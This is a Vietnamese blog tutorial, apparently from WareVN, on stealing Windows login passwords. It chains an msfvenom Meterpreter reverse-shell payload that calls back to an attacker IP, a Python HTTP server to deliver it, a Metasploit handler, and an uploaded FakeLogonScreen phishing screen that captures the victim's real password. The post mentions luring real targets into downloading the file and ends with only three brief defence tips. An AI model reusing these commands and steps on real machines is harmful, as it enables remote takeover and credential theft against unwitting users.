Hack mật khẩu Windows là một chủ đề cực hay và được nhiều người quan tâm nên WareVN quyết định làm bài hướng dẫn cách hack mật khẩu đăng nhập Windows.

Trong bài viết này, WareVN sẽ sử dụng FakeLogonScreen và Kali Linux để hack mật khẩu đăng nhập Windows. FakelogonScreen là một công cụ tiện dụng và chạy nền tạo ra nhật ký giả trên màn hình trên máy mục tiêu chạy Windows. Công cụ này buộc người dùng mục tiêu phải nhập thông tin đăng nhập chính xác và sau khi lấy được, sẽ chuyển nó cho hacker thông qua backdoor.

Với công cụ hữu ích này, nó tận dụng hành vi bình thường của môi trường Windows, hiển thị màn hình đăng nhập khi thoát khỏi chế độ sleep và yêu cầu nhập thông tin đăng nhập. Vào thời điểm đó, công cụ này tìm kiếm thông tin đăng nhập Windows lừa đảo từ mục tiêu và sức mạnh của công cụ này đến khi nó chỉ chấp nhận thông tin đăng nhập hợp lệ.

Các bước để hack mật khẩu Windows

Bây giờ chúng ta hãy thử công cụ này và thực hiện khai thác. Chúng ta cần triển khai hai máy ảo, trong bài viết này Ware VN tạo 2 máy ảo Kali Linux và Windows 10. Trong môi trường phòng thí nghiệm ảo của tôi, Kali (máy tấn công) có IP: 192.168.0.103 và Windows (máy đích) có 192.168.0.100.

Download FakeLogonScreen trong Kali Linux

Đầu tiên, chúng ta cần tải xuống tập tin FakeLogonScreen trong máy tấn công từ liên kết bên dưới:

và giả sử máy mục tiêu được kết nối với cùng một mạng với máy tấn công.

Tạo Malicious Payload để Hack Windows

Chúng tôi sẽ tạo một payload độc hại bằng cách sử dụng công cụ msfvenom theo thông tin mà hệ thống đích có được. Chúng tôi sẽ đặt lhost thành IP Kali của chúng tôi, tức là 192.168.0.103 và đặt lport là 4444. Vì chúng tôi quan tâm đến việc khai thác hệ thống Windows, chúng tôi sẽ tạo một trọng tải dưới dạng tệp thực thi để dễ dàng thực thi trên máy mục tiêu. Sử dụng lệnh:

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe

Ở đây ‘payload.exe’ là tên của payload được tạo. Sau đó, chúng tôi sẽ chạy Python One-liner để tạo một máy chủ HTTP sẽ lưu trữ malicious payload này tại port 80 của máy mục tiêu.

#python -m SimpleHTTPServer 80

hackwindows2

Download Payload trên Target Machine

Bây giờ, tất cả đã sẵn sàng, giai đoạn quan trọng nhất đã đến khi chúng ta phải có được mục tiêu để tải xuống malicious payload. Trong các tình huống thực tế, hacker có thể sử dụng các kỹ thuật khác nhau và cho phép người dùng mục tiêu tải tệp độc hại này vào hệ thống của mình.

Để chứng minh thực tế, chúng tôi sẽ truy cập thư mục máy Kali của chúng tôi từ máy Windows và tải xuống payload.hackwindows3

Điều này cũng sẽ hiển thị nhật ký hiện tại trong máy Kali của chúng tôi.hackwindows4

Khởi chạy Metasploit để khai thác

Hãy quay trở lại Kali và khởi chạy Metasploit-framework.

Sử dụng mô-đun multi / handler.hackwindows5

Đặt payload windows/meterpreter/reverse_tcp.hackwindows6

Đặt lhost làm IP của chúng tôi, tức là 192.168.0.103 và lport là 4444.hackwindows7

Sau khi cấu hình tất cả, chỉ cần chạy phần khai thác, quay trở lại máy Windows và chạy tệp thực thi ‘payload.exe’. Điều này sẽ nhanh chóng giúp chúng tôi có được meterpreter session (phiên dịch vụ đo lường).hackwindows8

Tải lên tệp có thể thực thi

Bây giờ tải lên tệp thực thi FakeLogonScreen mà chúng tôi đã tải xuống trước đó. Đảm bảo cung cấp cho nó đường dẫn chính xác của tệp exe.

>upload /root/Downloads/FakeLogonScreen.exe

Sau đó, lấy quyền truy cập shell và chạy FakeLogonScreen.exe như hiển thị bên dưới:hackwindows9

Và bùm!! Tại máy mục tiêu, tất cả các chương trình đang chạy sẽ bị đóng lại và màn hình đăng nhập Windows sẽ bật lên, yêu cầu thông tin đăng nhập xuất hiện như một cửa sổ hợp pháp. Người dùng sẽ không ngần ngại một giây để nhập thông tin đăng nhập của mình và tiếp tục công việc của mình.hackwindows10

Để kiểm tra độ mạnh của công cụ này, chúng tôi sẽ nhập sai mật khẩu.hackwindows11

Và điều này sẽ hiển thị lỗi “The password is incorrect, try again.”

Đây là điểm mạnh của công cụ FakeLogonScreen buộc mục tiêu phải nhập đúng mật khẩu của mình. Người dùng không có lựa chọn nào khác ngoài việc nhập mật khẩu của mình.

Hãy nhập mật khẩu chính xác và bạn sẽ nhận được cửa sổ tiêu chuẩn của mình như không có gì xảy ra trước đó.hackwindows12

Điều này cũng cho thấy FakeLogonScreen hoạt động tương tự như keylogger. Hacker sẽ dễ dàng theo dõi tất cả các nhật ký và có thể lấy đúng mật khẩu của người dùng mục tiêu.hackwindows13

Một số thông tin hữu ích

Công cụ này cũng có thể hoạt động hiệu quả trên nhiều hệ thống máy tính để bàn. Trong khi chạy nó trên các máy tính để bàn khác nhau, tất cả các màn hình bị ảnh hưởng sẽ chuyển sang màu đen ngay lập tức sau khi thực hiện khai thác từ máy tấn công. Điều này hoạt động ngay cả khi người dùng mục tiêu đã đặt nền tùy chỉnh.

Tệp zip của việc khai thác cũng bao gồm một tệp thực thi khác có tên “FakeLogonScreenToFile.exe” hoạt động giống như tệp thực thi trước đó. Tuy nhiên, nó có một số tính năng bổ sung, tức là không chỉ hiển thị mật khẩu mà còn lưu trữ nó trong “%LOCALAPPDATA%\Microsoft\user.db

Công cụ này cũng có thể được tích hợp với Cobalt Strike để hoạt động hiệu quả.

Cách phòng tránh bị hacker lấy password

  1. Đảm bảo xác minh mọi nguồn tải về là an toàn.
  2. Kiểm tra tất cả các liên kết một cách chính xác trên Màn hình đăng nhập.
  3. Thay đổi mật khẩu của bạn sau một thời gian.
Bài trướcHướng dẫn kiểm tra bản quyền Windown 11 nhanh chóng
Bài tiếp theo7 lời khuyên hàng đầu để mua laptop mới

ĐỂ LẠI BÌNH LUẬN

Nhập bình luận của bạn
Vui lòng nhập tên của bạn ở đây